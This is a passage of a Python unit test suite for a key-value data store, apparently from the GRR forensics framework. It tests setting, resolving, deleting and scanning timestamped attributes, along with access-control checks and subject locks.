  super(_DataStoreTest, self).setUp()
  self.InitDatastore()
  to_delete = ["aff4:/row:%s" % i for i in range(20)]
  to_delete.extend(["aff4:/C/%s" % i for i in range(7)])
  to_delete.extend(
      [self.test_row, self.lease_row, "aff4:/A/", "aff4:/B/", "aff4:/C/"])
  self._ClearDB(to_delete)
  # Tracks whether ACL checks have been installed by a test.
  self.acls_installed = False
def tearDown(self):
  """Tear down the custom data store after each test."""
  super(_DataStoreTest, self).tearDown()
  self.DestroyDatastore()
def InitDatastore(self):
  """Initiates custom data store. Hook for subclasses; no-op by default."""
def DestroyDatastore(self):
  """Destroys custom data store. Hook for subclasses; no-op by default."""
def _TruncateToMilliseconds(self, timestamp_int):
  """Round a microsecond timestamp down to whole-millisecond precision."""
  return (timestamp_int // 1000) * 1000
def testSetResolve(self):
  """Test the Set() and Resolve() methods."""
  predicate = "task:00000001"
  value = rdf_flows.GrrMessage(session_id="session")
  # Ensure that setting a value is immediately available.
  data_store.DB.Set(self.test_row, predicate, value, token=self.token)
  time.sleep(1)
  # A later write to a different row must not affect the first one.
  data_store.DB.Set(self.test_row + "X", predicate, value, token=self.token)
  stored_proto, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  stored_proto = rdf_flows.GrrMessage.FromSerializedString(stored_proto)
  self.assertEqual(stored_proto.session_id, value.session_id)
def testMultiSet(self):
  """Test the MultiSet() methods."""
  unicode_string = u"this is a uñîcödé string"
  data_store.DB.MultiSet(
      self.test_row, {
          "aff4:size": [1],
          "aff4:stored": [unicode_string],
          "aff4:unknown_attribute": ["hello"]
      },
      token=self.token)
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, unicode_string)
  # Make sure that unknown attributes are stored as bytes.
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:unknown_attribute", token=self.token)
  self.assertEqual(stored, "hello")
  self.assertEqual(type(stored), str)
def testMultiSetTimestamps(self):
  """MultiSet() must honour explicit (value, timestamp) tuples."""
  unicode_string = u"this is a uñîcödé string"
  data_store.DB.MultiSet(
      self.test_row,
      {"aff4:size": [(1, 1000)],
       "aff4:stored": [(unicode_string, 2000)]},
      token=self.token)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)
  self.assertEqual(ts, 1000)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, unicode_string)
  self.assertEqual(ts, 2000)
def testMultiSetNoneTimestampIsNow(self):
  """A None timestamp in MultiSet() must be replaced with the current time."""
  unicode_string = u"this is a uñîcödé string"
  # Timestamps are microseconds since epoch.
  start_time = time.time() * 1e6
  # Test None timestamp is translated to current time.
  data_store.DB.MultiSet(
      self.test_row,
      {"aff4:size": [(1, None)],
       "aff4:stored": [(unicode_string, 2000)]},
      token=self.token)
  end_time = time.time() * 1e6
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)
  # The assigned timestamp must fall inside the [start, end] window.
  self.assertGreaterEqual(ts, start_time)
  self.assertLessEqual(ts, end_time)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, unicode_string)
  self.assertEqual(ts, 2000)
def testMultiSetAsync(self):
  """Test the async MultiSet() methods."""
  unicode_string = u"this is a uñîcödé string"
  data_store.DB.MultiSet(
      self.test_row, {
          "aff4:size": [3],
          "aff4:stored": [unicode_string],
          "aff4:unknown_attribute": ["hello"]
      },
      sync=False,
      token=self.token)
  # Force the flusher thread to flush.
  data_store.DB.flusher_thread.target()
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 3)
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, unicode_string)
  # Make sure that unknown attributes are stored as bytes.
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:unknown_attribute", token=self.token)
  self.assertEqual(stored, "hello")
  self.assertEqual(type(stored), str)
def testMultiSet2(self):
  """Test the MultiSet() methods."""
  # Specify a per element timestamp
  data_store.DB.MultiSet(
      self.test_row, {"aff4:size": [(1, 1000)],
                      "aff4:stored": [("2", 2000)]},
      token=self.token)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)
  self.assertEqual(ts, 1000)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, "2")
  self.assertEqual(ts, 2000)
def testMultiSet3(self):
  """Test the MultiSet() delete methods."""
  data_store.DB.MultiSet(
      self.test_row, {"aff4:size": [1],
                      "aff4:stored": ["2"]},
      token=self.token)
  # Rewrite one attribute while deleting the other in the same call.
  data_store.DB.MultiSet(
      self.test_row, {"aff4:stored": ["2"]},
      to_delete=["aff4:size"],
      token=self.token)
  # This should be gone now
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertIsNone(stored)
  stored, _ = data_store.DB.Resolve(
      self.test_row, "aff4:stored", token=self.token)
  self.assertEqual(stored, "2")
def testMultiSet4(self):
  """Test the MultiSet() delete methods when deleting the same predicate."""
  data_store.DB.MultiSet(
      self.test_row, {"aff4:size": [1],
                      "aff4:stored": ["2"]},
      token=self.token)
  # Delete and re-set "aff4:size" in one call: only the new value survives.
  data_store.DB.MultiSet(
      self.test_row, {"aff4:size": [4]},
      to_delete=["aff4:size"],
      token=self.token)
  # This should only produce a single result
  count = 0
  for count, (predicate, value, _) in enumerate(
      data_store.DB.ResolvePrefix(
          self.test_row,
          "aff4:size",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token)):
    self.assertEqual(value, 4)
    self.assertEqual(predicate, "aff4:size")
  # enumerate leaves count at 0 iff exactly one row was returned.
  self.assertEqual(count, 0)
def testMultiSetSetsTimestapWhenReplacing(self):
  """MultiSet(replace=True) must keep the explicitly supplied timestamp."""
  data_store.DB.MultiSet(
      self.test_row, {"aff4:size": [(1, 1000)]},
      replace=True,
      token=self.token)
  stored, ts = data_store.DB.Resolve(
      self.test_row, "aff4:size", token=self.token)
  self.assertEqual(stored, 1)
  self.assertEqual(ts, 1000)
def testMultiSetRemovesOtherValuesWhenReplacing(self):
  """MultiSet(replace=True) must drop all previously stored versions."""
  # Fix: the original began with a ResolvePrefix call whose result was
  # immediately overwritten (dead query); it has been removed.
  # Write two timestamped versions without replacement; both are kept and
  # returned newest-first.
  data_store.DB.MultiSet(
      self.test_row, {"aff4:stored": [("2", 1000), ("3", 4000)]},
      replace=False,
      token=self.token)
  values = data_store.DB.ResolvePrefix(
      self.test_row,
      "aff4:stored",
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  self.assertListEqual(values, [("aff4:stored", "3", 4000), ("aff4:stored",
                                                             "2", 1000)])
  # Replacing must remove both older versions, leaving only the new value.
  data_store.DB.MultiSet(
      self.test_row, {"aff4:stored": [("4", 3000)]},
      replace=True,
      token=self.token)
  values = data_store.DB.ResolvePrefix(
      self.test_row,
      "aff4:stored",
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  self.assertListEqual(values, [("aff4:stored", "4", 3000)])
@DeletionTest
def testDeleteAttributes(self):
  """Test we can delete an attribute."""
  predicate = "metadata:predicate"
  data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
  # Check it's there.
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, "hello")
  data_store.DB.DeleteAttributes(
      self.test_row, [predicate], sync=True, token=self.token)
  stored, _ = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertIsNone(stored)
@DeletionTest
def testMultiDeleteAttributes(self):
  """Test we can delete multiple attributes at once."""
  test_rows = ["aff4:/row/%i" % i for i in range(0, 10)]
  predicate_1 = "metadata:predicate1"
  predicate_2 = "metadata:predicate2"
  for row in test_rows:
    data_store.DB.Set(row, predicate_1, "hello", token=self.token)
    data_store.DB.Set(row, predicate_2, "hello", token=self.token)
  # Both predicates must be present on all ten rows before deletion.
  self.assertEqual(10,
                   sum(1
                       for _ in data_store.DB.ScanAttribute(
                           "aff4:/row/", predicate_1, token=self.token)))
  self.assertEqual(10,
                   sum(1
                       for _ in data_store.DB.ScanAttribute(
                           "aff4:/row/", predicate_2, token=self.token)))
  data_store.DB.MultiDeleteAttributes(
      test_rows, [predicate_1, predicate_2], token=self.token)
  # ... and gone from all of them afterwards.
  self.assertEqual(0,
                   sum(1
                       for _ in data_store.DB.ScanAttribute(
                           "aff4:/row/", predicate_1, token=self.token)))
  self.assertEqual(0,
                   sum(1
                       for _ in data_store.DB.ScanAttribute(
                           "aff4:/row/", predicate_2, token=self.token)))
def CheckLength(self, predicate, l):
  """Assert that the test row holds exactly l versions of predicate in (0, 5000)."""
  all_attributes = data_store.DB.ResolveMulti(
      self.test_row, [predicate], timestamp=(0, 5000), token=self.token)
  self.assertEqual(len(list(all_attributes)), l)
def CheckLast(self, predicate, expected_value, exptected_ts):
  """Assert the newest version of predicate on the test row.

  NOTE(review): "exptected_ts" is a typo of "expected_ts"; kept as-is to
  avoid breaking potential keyword callers.
  """
  stored, ts = data_store.DB.Resolve(
      self.test_row, predicate, token=self.token)
  self.assertEqual(stored, expected_value)
  self.assertEqual(ts, exptected_ts)
@DeletionTest
def testDeleteAttributesTimestamps(self):
  """Test we can delete an attribute in a time range."""
  predicate = "metadata:tspredicate"
  # Store four non-replacing versions at timestamps 1000..4000.
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello1000",
      timestamp=1000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello2000",
      timestamp=2000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello3000",
      timestamp=3000,
      replace=False,
      token=self.token)
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello4000",
      timestamp=4000,
      replace=False,
      token=self.token)
  # Check its there
  self.CheckLast(predicate, "hello4000", 4000)
  self.CheckLength(predicate, 4)
  # Delete timestamps between 0 and 1500.
  data_store.DB.DeleteAttributes(
      self.test_row, [predicate],
      start=0,
      end=1500,
      sync=True,
      token=self.token)
  self.CheckLast(predicate, "hello4000", 4000)
  self.CheckLength(predicate, 3)
  # Delete timestamps between 3000 and 4500.
  data_store.DB.DeleteAttributes(
      self.test_row, [predicate],
      start=3000,
      end=4500,
      sync=True,
      token=self.token)
  self.CheckLast(predicate, "hello2000", 2000)
  self.CheckLength(predicate, 1)
  # Delete everything.
  data_store.DB.DeleteAttributes(
      self.test_row, [predicate],
      start=0,
      end=5000,
      sync=True,
      token=self.token)
  self.CheckLast(predicate, None, 0)
  self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubject(self):
  """Deleting a subject must remove all of its attributes."""
  predicate = "metadata:tspredicate"
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello1000",
      timestamp=1000,
      replace=False,
      token=self.token)
  data_store.DB.DeleteSubject(self.test_row, token=self.token)
  data_store.DB.Flush()
  self.CheckLength(predicate, 0)
  # This should work with the sync argument too.
  data_store.DB.Set(
      self.test_row,
      predicate,
      "hello1000",
      timestamp=1000,
      replace=False,
      token=self.token)
  data_store.DB.DeleteSubject(self.test_row, token=self.token, sync=True)
  self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubjects(self):
  """Bulk subject deletion must remove exactly the given rows."""
  row_template = "aff4:/deletesubjectstest%d"
  rows = [row_template % i for i in xrange(100)]
  predicate = "metadata:tspredicate"
  for i, row in enumerate(rows):
    data_store.DB.Set(
        row,
        predicate,
        "hello%d" % i,
        timestamp=1000,
        replace=False,
        token=self.token)
  data_store.DB.Flush()
  # Delete only the middle 60 rows.
  data_store.DB.DeleteSubjects(rows[20:80], token=self.token)
  data_store.DB.Flush()
  res = dict(
      data_store.DB.MultiResolvePrefix(rows, predicate, token=self.token))
  for i in xrange(100):
    if 20 <= i < 80:
      # These rows have been deleted.
      self.assertNotIn(row_template % i, res)
    else:
      # These rows should be present.
      self.assertIn(row_template % i, res)
def testMultiResolvePrefix(self):
  """tests MultiResolvePrefix."""
  rows = self._MakeTimestampedRows()
  # Only rows 3 and 7 carry the requested attributes.
  subjects = dict(
      data_store.DB.MultiResolvePrefix(
          rows, ["metadata:3", "metadata:7"], token=self.token))
  subject_names = subjects.keys()
  subject_names.sort()
  self.assertEqual(len(subjects), 2)
  self.assertEqual(subject_names, [u"aff4:/row:3", u"aff4:/row:7"])
  # Build rows whose attribute names differ only in prefix length (X..XXXXX).
  rows = []
  for r in range(1, 6):
    row_name = "aff4:/prefix_row_%d" % r
    rows.append(row_name)
    for i in range(1, 6):
      timestamp = rdfvalue.RDFDatetime(1000 * i)
      data_store.DB.Set(
          row_name,
          "metadata:%s" % ("X" * i),
          str(i),
          timestamp=timestamp,
          token=self.token)
  subjects = dict(
      data_store.DB.MultiResolvePrefix(rows, ["metadata:"], token=self.token))
  self.assertItemsEqual(subjects.keys(), rows)
  row = subjects["aff4:/prefix_row_4"]
  self.assertEqual(len(row), 5)
  subjects = dict(
      data_store.DB.MultiResolvePrefix(
          rows, ["metadata:XXX"], token=self.token))
  self.assertItemsEqual(subjects.keys(), rows)
  for row in subjects.values():
    # Those with 3-5 X's.
    self.assertEqual(len(row), 3)
    self.assertIn((u"metadata:XXX", "3", 3000), row)
    self.assertNotIn((u"metadata:XX", "2", 2000), row)
  # Test unicode subjects.
  unicode_string = u"this is a uñîcödé string"
  attributes = set()
  for i in range(5, 10):
    attributes.add(("metadata:%s" % i, "data%d" % i))
    data_store.DB.MultiSet(
        unicode_string, {"metadata:%s" % i: ["data%d" % i]}, token=self.token)
  result = dict(
      data_store.DB.MultiResolvePrefix(
          [unicode_string], ["metadata:"], token=self.token))
  result_set = set((k, v) for k, v, _ in result[unicode_string])
  self.assertEqual(result_set, attributes)
def _MakeTimestampedRows(self):
  """Create rows aff4:/row:1..10 with timestamps 1000*i; return their names.

  Rows 1-5 are written with Set(), rows 6-10 with MultiSet(), so both
  write paths are exercised by callers.
  """
  # Make some rows.
  rows = []
  for i in range(1, 6):
    row_name = "aff4:/row:%s" % i
    timestamp = rdfvalue.RDFDatetime(1000 * i)
    data_store.DB.Set(
        row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
    rows.append(row_name)
  for i in range(6, 11):
    row_name = "aff4:/row:%s" % i
    timestamp = rdfvalue.RDFDatetime(1000 * i)
    data_store.DB.MultiSet(
        row_name, {"metadata:%s" % i: [i]},
        timestamp=timestamp,
        token=self.token)
    rows.append(row_name)
  return rows
def _CheckResultTimestamps(self, result, expected_timestamps):
  """Assert that all timestamps in a MultiResolvePrefix result match."""
  timestamps = []
  for predicates in result.itervalues():
    for predicate in predicates:
      # Each entry is a (predicate, value, timestamp) tuple.
      timestamps.append(predicate[2])
  self.assertListEqual(sorted(timestamps), sorted(expected_timestamps))
def testMultiResolvePrefixTypePreservation(self):
  """Check result subjects have same format as original calls."""
  rows = [
      "aff4:/row:str",
      u"aff4:/row:unicode",
      rdfvalue.RDFURN("aff4:/row:URN"),
      "aff4:/row:str",
      u"aff4:/row:unicode",
      rdfvalue.RDFURN("aff4:/row:URN"),
  ]
  # Idiom fix: enumerate replaces the manually incremented counter.
  for i, row_name in enumerate(rows):
    timestamp = rdfvalue.RDFDatetime(1000 + i)
    data_store.DB.Set(
        row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
  subjects = dict(
      data_store.DB.MultiResolvePrefix(
          rows, ["metadata:0", "metadata:2", "metadata:4"], token=self.token))
  # The returned subject keys must be of the same types as those passed in.
  self.assertEqual(
      set([type(s) for s in subjects]), set([type(s) for s in rows]))
  self.assertIn(rows[0], subjects)
  self.assertIn(rows[2], subjects)
  self.assertIn(rows[4], subjects)
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder1(self):
  """Values set oldest-first must still be returned newest-first."""
  predicate1 = "metadata:predicate1"
  subject = "aff4:/test_resolve_regex_results_order_in_dec_order1"
  # Set 100 values with increasing timestamps.
  for i in range(100):
    data_store.DB.Set(
        subject,
        predicate1,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
  # Check that results will be returned in decreasing timestamp order.
  # This test along with a next one tests that no matter how
  # values were set, they will be sorted by timestamp in the decreasing
  # order when fetched.
  result = data_store.DB.ResolvePrefix(
      subject,
      predicate1,
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder2(self):
  """Values set newest-first must also be returned newest-first."""
  predicate1 = "metadata:predicate1"
  subject = "aff4:/test_resolve_regex_results_order_in_dec_order2"
  # Set 100 values with timestamps starting in the future and going to
  # the past.
  for i in reversed(range(100)):
    data_store.DB.Set(
        subject,
        predicate1,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
  # Check that results will be returned in decreasing timestamp order.
  # This test along with a previous one tests that no matter how
  # values were set, they will be sorted by timestamp in the decreasing
  # order when fetched.
  result = data_store.DB.ResolvePrefix(
      subject,
      predicate1,
      timestamp=data_store.DB.ALL_TIMESTAMPS,
      token=self.token)
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn1(self):
  """Per-column ordering must be newest-first when set oldest-first."""
  predicate1 = "metadata:predicate1"
  predicate2 = "metadata:predicate2"
  subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column1"
  # Set 100 values with increasing timestamps for each predicate.
  for i in range(100):
    data_store.DB.Set(
        subject,
        predicate1,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
    data_store.DB.Set(
        subject,
        predicate2,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
  # Check that results will be returned in decreasing timestamp order
  # per column.
  # This test along with a previous one tests that no matter how
  # values were set, they will be sorted by timestamp in the decreasing
  # order when fetched.
  result = list(
      data_store.DB.ResolvePrefix(
          subject,
          "metadata:predicate",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          limit=1000,
          token=self.token))
  predicate1_results = [r for r in result if r[0] == predicate1]
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
                                                        i * 1000))
  predicate2_results = [r for r in result if r[0] == predicate2]
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
                                                        i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn2(self):
  """Per-column ordering must be newest-first when set newest-first."""
  predicate1 = "metadata:predicate1"
  predicate2 = "metadata:predicate2"
  subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column2"
  # Set 100 values for each predicate with timestamps starting in the
  # future and going to the past.
  for i in reversed(range(100)):
    data_store.DB.Set(
        subject,
        predicate1,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
    data_store.DB.Set(
        subject,
        predicate2,
        str(i),
        timestamp=i * 1000,
        replace=False,
        token=self.token)
  # Check that results will be returned in decreasing timestamp order
  # per column.
  # This test along with a previous one tests that no matter how
  # values were set, they will be sorted by timestamp in the decreasing
  # order when fetched.
  result = list(
      data_store.DB.ResolvePrefix(
          subject,
          "metadata:predicate",
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          limit=1000,
          token=self.token))
  predicate1_results = [r for r in result if r[0] == predicate1]
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
                                                        i * 1000))
  predicate2_results = [r for r in result if r[0] == predicate2]
  for result_index, i in enumerate(reversed(range(100))):
    self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
                                                        i * 1000))
def testScanAttribute(self):
  """ScanAttribute must return newest values, honour prefixes and limits."""
  data_store.DB.Set("aff4:/A", "aff4:foo", "A value", token=self.token)
  for i in range(1, 10):
    # Same timestamp written twice with replace (default): second wins.
    data_store.DB.Set(
        "aff4:/B/" + str(i),
        "aff4:foo",
        "B " + str(i) + " old value",
        timestamp=2000,
        token=self.token)
    data_store.DB.Set(
        "aff4:/B/" + str(i),
        "aff4:foo",
        "B " + str(i) + " value",
        timestamp=2000,
        token=self.token)
    # An additional older, non-replacing version must not be returned.
    data_store.DB.Set(
        "aff4:/B/" + str(i),
        "aff4:foo",
        "B " + str(i) + " older value",
        timestamp=1900,
        token=self.token,
        replace=False)
  # Something with a different attribute, which should not be included.
  data_store.DB.Set(
      "aff4:/B/1.1",
      "aff4:foo2",
      "B 1.1 other value",
      timestamp=2000,
      token=self.token)
  data_store.DB.Set("aff4:/C", "aff4:foo", "C value", token=self.token)
  values = [(r[1], r[2])
            for r in data_store.DB.ScanAttribute(
                "aff4:/B", "aff4:foo", token=self.token)]
  self.assertEqual(values, [(2000, "B " + str(i) + " value")
                            for i in range(1, 10)])
  # max_records caps the number of returned rows.
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/B", "aff4:foo", max_records=2, token=self.token)
  ]
  self.assertEqual(values, ["B " + str(i) + " value" for i in range(1, 3)])
  # after_urn resumes the scan after the given subject (exclusive).
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/B", "aff4:foo", after_urn="aff4:/B/2", token=self.token)
  ]
  self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 10)])
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/B",
          u"aff4:foo",
          after_urn=rdfvalue.RDFURN("aff4:/B/2"),
          max_records=2,
          token=self.token)
  ]
  self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 5)])
  # Scanning the root (or the empty prefix) returns all matching rows.
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/", "aff4:foo", token=self.token)
  ]
  self.assertEqual(
      values, ["A value"] + ["B " + str(i) + " value"
                             for i in range(1, 10)] + ["C value"])
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute("", "aff4:foo", token=self.token)
  ]
  self.assertEqual(
      values, ["A value"] + ["B " + str(i) + " value"
                             for i in range(1, 10)] + ["C value"])
  # Subjects ending in "/" must also be scannable.
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha1/", "aff4:hash", "h1", token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha1/AAAAA",
      "aff4:hash",
      "h2",
      token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha1/AAAAB",
      "aff4:hash",
      "h3",
      token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha256/", "aff4:hash", "h4", token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha256/AAAAA",
      "aff4:hash",
      "h5",
      token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha256/AAAAB",
      "aff4:hash",
      "h6",
      token=self.token)
  data_store.DB.Set(
      "aff4:/files/hash/generic/sha90000",
      "aff4:hash",
      "h7",
      token=self.token)
  (value, _) = data_store.DB.Resolve(
      "aff4:/files/hash/generic/sha90000", "aff4:hash", token=self.token)
  self.assertEqual(value, "h7")
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/files/hash", "aff4:hash", token=self.token)
  ]
  self.assertEqual(values, ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
  # relaxed_order may return rows in any order; compare sorted.
  values = [
      r[2]
      for r in data_store.DB.ScanAttribute(
          "aff4:/files/hash",
          "aff4:hash",
          token=self.token,
          relaxed_order=True)
  ]
  self.assertEqual(sorted(values), ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
def testScanAttributeRequiresReadAccess(self):
  """Scanning without read ("r") access must raise UnauthorizedAccess."""
  self._InstallACLChecks("r")
  v = data_store.DB.ScanAttribute("aff4:/", "aff4:hash", token=self.token)
  # The generator only raises once it is advanced.
  self.assertRaises(access_control.UnauthorizedAccess, v.next)
def testScanAttributeRequiresQueryAccess(self):
  """Scanning without query ("q") access must raise UnauthorizedAccess."""
  self._InstallACLChecks("q")
  v = data_store.DB.ScanAttribute("aff4:/", "aff4:hash", token=self.token)
  # The generator only raises once it is advanced.
  self.assertRaises(access_control.UnauthorizedAccess, v.next)
def testScanAttributes(self):
  """ScanAttributes must merge several attributes per subject, newest only."""
  # Rows 0-6 get aff4:foo (with an older shadowed version).
  for i in range(0, 7):
    data_store.DB.Set(
        "aff4:/C/" + str(i),
        "aff4:foo",
        "C foo " + str(i) + " value",
        timestamp=10000,
        token=self.token)
    data_store.DB.Set(
        "aff4:/C/" + str(i),
        "aff4:foo",
        "C foo " + str(i) + " old value",
        timestamp=9000,
        token=self.token,
        replace=False)
  # Rows 3-9 get aff4:bar, so rows 3-6 carry both attributes.
  for i in range(3, 10):
    data_store.DB.Set(
        "aff4:/C/" + str(i),
        "aff4:bar",
        "C bar " + str(i) + " value",
        timestamp=15000,
        token=self.token)
    data_store.DB.Set(
        "aff4:/C/" + str(i),
        "aff4:bar",
        "C bar " + str(i) + " old value",
        timestamp=9500,
        token=self.token,
        replace=False)
  # A subject with an unrequested attribute must not appear in results.
  data_store.DB.Set(
      "aff4:/C/5a",
      "aff4:baz",
      "C baz value",
      timestamp=9800,
      token=self.token)
  results = list(
      data_store.DB.ScanAttributes(
          "aff4:/C", ["aff4:foo", "aff4:bar"], token=self.token))
  self.assertEqual(len(results), 10)
  self.assertEqual([s for s, _ in results],
                   ["aff4:/C/" + str(i) for i in range(10)])
  self.assertEqual(results[0][1], {"aff4:foo": (10000, "C foo 0 value")})
  self.assertEqual(results[5][1], {
      "aff4:bar": (15000, "C bar 5 value"),
      "aff4:foo": (10000, "C foo 5 value")
  })
  self.assertEqual(results[9][1], {"aff4:bar": (15000, "C bar 9 value")})
  results = list(
      data_store.DB.ScanAttributes(
          "aff4:/C", ["aff4:foo", "aff4:bar"],
          max_records=5,
          token=self.token))
  self.assertEqual(len(results), 5)
def testRDFDatetimeTimestamps(self):
  """RDFDatetime values must be usable wherever a timestamp is accepted."""
  test_rows = self._MakeTimestampedRows()
  # Make sure all timestamps are set correctly.
  result = dict(
      data_store.DB.MultiResolvePrefix(
          test_rows, ["metadata:"], token=self.token))
  self._CheckResultTimestamps(result, range(1000, 11000, 1000))
  # Now MultiResolve by timestamp.
  timestamp = (rdfvalue.RDFDatetime(3000), rdfvalue.RDFDatetime(8000))
  result = dict(
      data_store.DB.MultiResolvePrefix(
          test_rows, ["metadata:"], token=self.token, timestamp=timestamp))
  # Timestamp selection is inclusive so we should have 3k-8k.
  self._CheckResultTimestamps(result, range(3000, 9000, 1000))
  # Now test timestamped attributes.
  row_name = "aff4:/attribute_test_row"
  attribute_name = "metadata:test_attribute"
  attributes_to_set = {
      attribute_name: [(i, rdfvalue.RDFDatetime(i))
                       for i in xrange(1000, 11000, 1000)]
  }
  data_store.DB.MultiSet(
      row_name, attributes_to_set, replace=False, token=self.token)
  # Make sure all timestamps are set correctly.
  result = dict(
      data_store.DB.MultiResolvePrefix(
          [row_name], ["metadata:"],
          timestamp=data_store.DB.ALL_TIMESTAMPS,
          token=self.token))
  self._CheckResultTimestamps(result, range(1000, 11000, 1000))
  if self.TEST_DELETION:
    # Delete some of them.
    data_store.DB.DeleteAttributes(
        row_name, [attribute_name],
        start=rdfvalue.RDFDatetime(2000),
        end=rdfvalue.RDFDatetime(4000),
        token=self.token)
    # Make sure that passing start==end deletes that version.
    data_store.DB.DeleteAttributes(
        row_name, [attribute_name],
        start=rdfvalue.RDFDatetime(6000),
        end=rdfvalue.RDFDatetime(6000),
        token=self.token)
    result = dict(
        data_store.DB.MultiResolvePrefix(
            [row_name], ["metadata:"],
            timestamp=data_store.DB.ALL_TIMESTAMPS,
            token=self.token))
    expected_timestamps = [1000, 5000, 7000, 8000, 9000, 10000]
    self._CheckResultTimestamps(result, expected_timestamps)
@DBSubjectLockTest
def testDBSubjectLocks(self):
  """Test lock locking."""
  predicate = u"metadata:predicateÎñţér"
  subject = u"aff4:/metadata:rowÎñţér"
  # t1 is holding a lock on this row.
  with data_store.DB.DBSubjectLock(subject, token=self.token):
    # This means that modification of this row will fail using a different
    # lock.
    self.assertRaises(
        data_store.DBSubjectLockError,
        data_store.DB.DBSubjectLock,
        subject,
        token=self.token)
    # Writes through the store itself are still allowed while locked.
    data_store.DB.Set(subject, predicate, "1", token=self.token)
    self.assertEqual(
        data_store.DB.Resolve(subject, predicate, token=self.token)[0], "1")
  # After the context manager exits, the lock can be re-acquired.
  t2 = data_store.DB.DBSubjectLock(subject, token=self.token)
  self.assertRaises(
      data_store.DBSubjectLockError,
      data_store.DB.DBSubjectLock,
      subject,
      token=self.token)
  t2.Release()
  t3 = data_store.DB.DBSubjectLock(subject, token=self.token)
  self.assertTrue(t3.CheckLease())
  t3.Release()
@DBSubjectLockTest
def testDBSubjectLockIndependence(self):
  """Check that locks don't influence each other."""
  subject = u"aff4:/metadata:rowÎñţér"
  subject2 = u"aff4:/metadata:rowÎñţér2"
  t1 = data_store.DB.DBSubjectLock(subject, token=self.token)
  # Check it's locked.
  self.assertRaises(
      data_store.DBSubjectLockError,
      data_store.DB.DBSubjectLock,
      subject,
      token=self.token)
  # t2 is holding a lock on this row.
  t2 = data_store.DB.DBSubjectLock(subject2, token=self.token)
  # This means that modification of this row will fail using a different
  # lock.
  self.assertRaises(
